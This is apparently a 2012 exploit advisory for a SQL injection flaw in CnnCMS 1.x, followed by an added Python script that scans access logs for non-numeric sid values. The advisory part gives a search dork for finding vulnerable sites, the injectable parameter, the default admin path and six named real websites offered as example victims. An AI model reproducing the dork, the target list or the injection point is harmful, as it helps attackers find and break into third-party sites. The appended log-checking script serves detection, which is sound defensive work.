=========================================================================
CnnCMS 1.x SQL Injection Vulnerability
=========================================================================

:-----------------------------------------------------------------------:
: # Exploit Title : CnnCMS 1.x SQL Injection Vulnerability
: # Date          : March 3rd 2012
: # Author        : X-Cisadane
: # Software Link : http://www.thinknolimits.com/
: # Version       : 1.x
: # Category      : Web Applications
: # Vulnerability : SQL Injection
: # Tested On     : Google Chrome 14.0.835 (Windows)
: # Dorks         : inurl:sub_menu.php?sid=
: # Greetz to     : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari
:-----------------------------------------------------------------------:

SQL Injection Vulnerability:
- Open Victim Website : http:////sub_menu.php?sid=-[SQL]

Example:
http://garden-goldenteakfurniture.com/sub_menu.php?sid=-13
http://lunar.co.id/sub_menu.php?sid=-1
http://www.djawaleather.com/sub_menu.php?sid=-1
http://www.gravigra.com/sub_menu.php?sid=-1
http://www.harpagreen.com/sub_menu.php?sid=-2
http://www.suwastama.co.id/sub_menu.php?sid=-1

Admin Page (Default) : http:////admin/
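
Added example (not part of the original advisory and not CnnCMS code): a Python check for site owners that flags access-log requests to sub_menu.php whose sid value is not a plain non-negative integer, the request pattern this advisory describes. It assumes combined-format access logs and that legitimate sid values are numeric ids; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: client identd user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def suspicious_sid_requests(lines):
    """Return (client, timestamp, status, sid) for each request to
    sub_menu.php whose sid is not a plain non-negative integer.
    Assumption: legitimate sid values are short numeric ids."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, when, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/sub_menu.php"):
            continue
        # parse_qs URL-decodes values; keep_blank_values so an empty "sid=" is seen too
        params = parse_qs(url.query, keep_blank_values=True)
        for sid in params.get("sid", []):
            if not re.fullmatch(r"[0-9]{1,10}", sid):
                hits.append((client, when, int(status), sid))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Mar/2012:10:01:02 +0700] "GET /sub_menu.php?sid=13 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [03/Mar/2012:10:02:10 +0700] "GET /sub_menu.php?sid=-13 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [03/Mar/2012:10:02:15 +0700] "GET /sub_menu.php?sid=2%20abc HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Mar/2012:10:03:00 +0700] "GET /index.php?sid=-1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, when, status, sid in suspicious_sid_requests(SAMPLE_LOG):
        print(f"{when} {client} status={status} sid={sid!r}")
```

Hits from one client in a short window, or hits answered with 5xx status codes, are the ones to review first.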